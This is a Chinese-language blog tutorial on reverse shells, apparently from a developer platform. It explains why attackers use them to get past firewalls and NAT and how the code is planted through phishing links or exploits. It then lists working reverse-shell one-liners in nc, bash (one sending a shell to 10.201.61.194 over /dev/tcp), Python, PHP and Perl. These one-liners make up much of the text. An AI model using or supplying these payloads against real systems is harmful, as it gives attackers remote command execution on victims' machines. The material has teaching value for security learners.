Reverse Shell

一、Reverse Shell原理

1.什么是ReverseShell

反弹shell(reverse shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。

为什么要反弹shell?

通常用于被控端因防火墙受限、权限不足、端口被占用等情形。

举例:假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向连接。远程桌面、web服务、ssh、telnet等等都是正向连接。那么什么情况下正向连接不能用了呢?

有如下情况:

1.某客户机中了你的网马,但是它在局域网内,你直接连接不了。

2.目标机器的ip动态改变,你不能持续控制。

3.由于防火墙等限制,对方机器只能发送请求,不能接收请求。

4.对于病毒,木马,受害者什么时候能中招,对方的网络环境是什么样的,什么时候开关机等情况都是未知的,所以建立一个服务端让恶意程序主动连接,才是上策。

那么反弹就很好理解了,攻击者指定服务端,受害者主机主动连接攻击者的服务端程序,就叫反弹连接。

2.ReverseShell的实现

通常攻击端作为服务端进行监听,运行指令如下:

# nc  -lnvvp 3333

受害端反弹shell:

[root@victim ~]# bash -i >& /dev/tcp/10.201.61.194/3333 0>&1

反弹shell支持php/perl/java/bash等进行反弹,具体内容如下所示。

二、ReverseShell示例

1.完成正向Shell的场景

  1. 以localhost为例
    1.  nc -lnvvp 3333 –e /bin/sh
  2. 客户端连接
    1.  nc localhost 3333
  3. 客户端随意访问服务端的shell

2.完成基于nc的Reverse Shell场景

  1. 目的:服务端控制客户端shell
  2. 服务端操作:
    1.  nc –lnvvp 3333
  3. 客户端操作:
    1.  nc localhost 3333 –e /bin/sh
    2.  效果: 服务端操作客户端的shell

3.完成基于Bash的Reverse Shell场景

#bash

#bash -i   >&  /dev/tcp/127.0.0.1/3333   0>&1

注意: 一定要先切换到bash,就可以反弹shell

两个窗口:

nc  -lnvvp  3333

nc  -lnvvp  4444

nc  localhost 3333  | /bin/bash  |  nc localhost 4444

4.完成基于Python的 Reverse Shell场景

python -c 'import socket,subprocess,os; \

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);

s.connect(("localhost",3333));

os.dup2(s.fileno(),0);

os.dup2(s.fileno(),1);

os.dup2(s.fileno(),2);

p=subprocess.call(["/bin/sh","-i"]);'

5.完成基于PHP的Reverse Shell场景

php -r '$f=fsockopen("127.0.0.1",3333);exec("/bin/sh -i <&3 >&3 2>&3");'

6.完成基于PERL的Reverse Shell场景

perl -e 'use Socket;$i="x.x.x.x";$p=3333;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

三、总结

1.Reverse Shell的概念

Reverse shell是一种远程访问技术,其基本原理是让攻击者通过网络连接到受害者电脑的命令行界面或者终端进行操作,而不需要直接访问被攻击者的电脑。攻击者通过将特定的代码注入到受害者电脑中,以建立与其的通信通道,然后与受害者电脑的命令行界面或终端进行交互,达到对其进行控制的目的。Reverse shell通常被黑客用来远程控制被攻击的计算机,执行恶意代码、窃取敏感信息、修改、删除或传输文件、升级权限等行为。

2.Nc实现 Reverse Shell的方法

  1. 攻击者需要先在自己的计算机上开启Nc监听程序,以便等待受害者连接。
  2. 攻击者需要将Reverse shell的代码以一种方式注入到受害者的计算机中。这可以通过各种方式实现,例如使用社交工程学手段欺骗用户点击恶意链接、通过漏洞利用攻击者成功入侵电脑系统等方法。
  3. 一旦受害者电脑上的代码运行成功,将会建立一个反向连接,使得Nc监听程序和受害者的计算机相连接。
  4. 攻击者可以通过与受害者电脑建立的连接,在目标主机上执行各种命令,以达到控制、修改或操控目标设备的目的。

3.Bash实现 Reverse Shell的方法

  1. 攻击者需要在自己的计算机上开启一个监听程序,等待受害者连接。
  2. 攻击者需要准备一个Bash Reverse shell代码。
  3. 攻击者在Bash Reverse shell代码中设置自己计算机的IP地址和端口,并将代码发送给受害者。
  4. 受害者运行Bash Reverse shell代码后,将会建立一条反向连接。连接成功后,攻击者可以向受害者发送命令,对其进行控制、修改或操控目标设备。
  • 12
    点赞
  • 14
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值